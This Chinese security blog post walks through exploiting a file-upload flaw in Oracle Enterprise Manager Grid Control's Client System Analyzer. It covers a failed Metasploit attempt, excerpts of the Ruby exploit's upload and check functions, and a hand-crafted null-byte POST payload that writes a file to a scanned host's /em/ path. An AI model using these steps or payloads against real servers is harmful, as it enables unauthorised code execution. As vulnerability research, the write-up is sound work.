*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。
*本文原创作者:一只胖麻瓜biu,本文属FreeBuf原创奖励计划,未经许可禁止转载
0x1
Oracle Enterprise Manager Grid Control是可以监控和管理网格中的Oracle数据库软件的工具。
Oracle Enterprise Manager Grid Control在实现上存在安全漏洞,远程攻击者可利用此漏洞执行任意JSP代码。
在上传XML文件时,通过未指定的POST参数发送到"Client System Analyzer"组件某些JSP脚本的输入在用于创建XML文件之前未正确过滤,通过在请求中提供空字节造成任意JSP代码执行。
应用程序通过OCI的方式,访问数据库服务器,而OCI的访问模式,必须要安装Oracle Client。
参考链接:http://blog.csdn.net/hpuedu1909/article/details/14454241
0x2
最近用绿盟扫描器扫到一个:
host:https://x.x.x.x:1158
访问存在漏洞的服务器:
msf中search此exp:
使用此exp:
发现失败了
show options查看一下payload:
此处为payload为reverse_tcp反向连接。
reverse_tcp反向连接(本机监听)//是服务器来连接攻击者,返回一个SHELL。
bind_tcp 正向连接 (目标监听) // 是攻击者主动连接服务器得到一个SHELL。
reverse_tcp 就是攻击者开启端口等待远程目标连接,bind_tcp 就是远程目标开启一个端口,等待攻击者连接,不用做端口映射。
考虑此处是否由于正反向连接问题,所以换成bind_tcp正向连接:
exp:
发现仍然失败
查找此漏洞披露平台(此为SCAP中文社区),查看此exp代码:
--ruby代码
代码主体为:
equire 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info={})//对漏洞利用的说明
……
def on_new_session(client)
……
def upload_file(data)
……
def check
……
def exploit//进行远程代码执行
……
end
其中核心函数为exploit函数
发现其中关键函数upload_file:
def upload_file(data)
res = send_request_cgi(
{
'uri' => 'd/em/ecm/csa/v10103/CSAr.jsp',
'method' => 'POST',
'data' => data
})
return res
end
最后返回的是res,推测res为上传的文件,其中uri是上传的页面,方法为POST,数据为data
先访问一下地址,查看是否存在该页面:
此处已判断该页面是一个可访问的空白页面
继续查看代码,def check函数:
data = "sessionID=#{file_name}.txt\x00.xml"
data << "\x0d\x0a"
data << Rex::Text.uri_encode(file_contents)
print_status("Uploading the CSA#{file_name}.txt file")
res = upload_file(data)
if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/)
print_error("The test file could not be uploaded")
print_status("Checking uploaded contents...")
res = send_request_raw({'uri' => "/em/CSA#{file_name}.txt"})
若上传成功,上传后的地址为x.x.x.x:1158/em/CSAhack.txt
此处说明只有csaPostStatus=0的时候才上传成功。
借助一下hackbar,此处构造的data数据:sessionID=hack.txt\x00.xml\x0d\x0ahack
发现页面返回csaPostStatus=5信息,根据代码说明只有csaPostStatus=0的时候才表示上传成功,
尝试一下转义:
页面返回csaPostStatus=0,访问一下上传页面:
空白页面,未成功
把/x换成%,再试一下:
\xhh表示两位的十六进制
\x00======NULL
\x0d======回车
\x0a======\r
重名报错了,说明上个步骤的hack.txt已经是上传成功了,换个名字试试:
然而页面还是访问不了-_-
到这才发现,忽略了很重要的东西,传输的方法必须是post
所以在bp中试一下,仍然需要将/x换成%:
再进行url的decode:
终于出来了flag,访问页面:
到这可以发现是已经上传成功了。
0x3
Oracle Database Server 11.1.0.7和11.2.0.1版本,以及Enterprise Manager Grid Control 10.2.0.5版本的Client System Analyzer组件中存在未明漏洞。
第一次投稿,请大家指正。
*本文原创作者:一只胖麻瓜biu,本文属FreeBuf原创奖励计划,未经许可禁止转载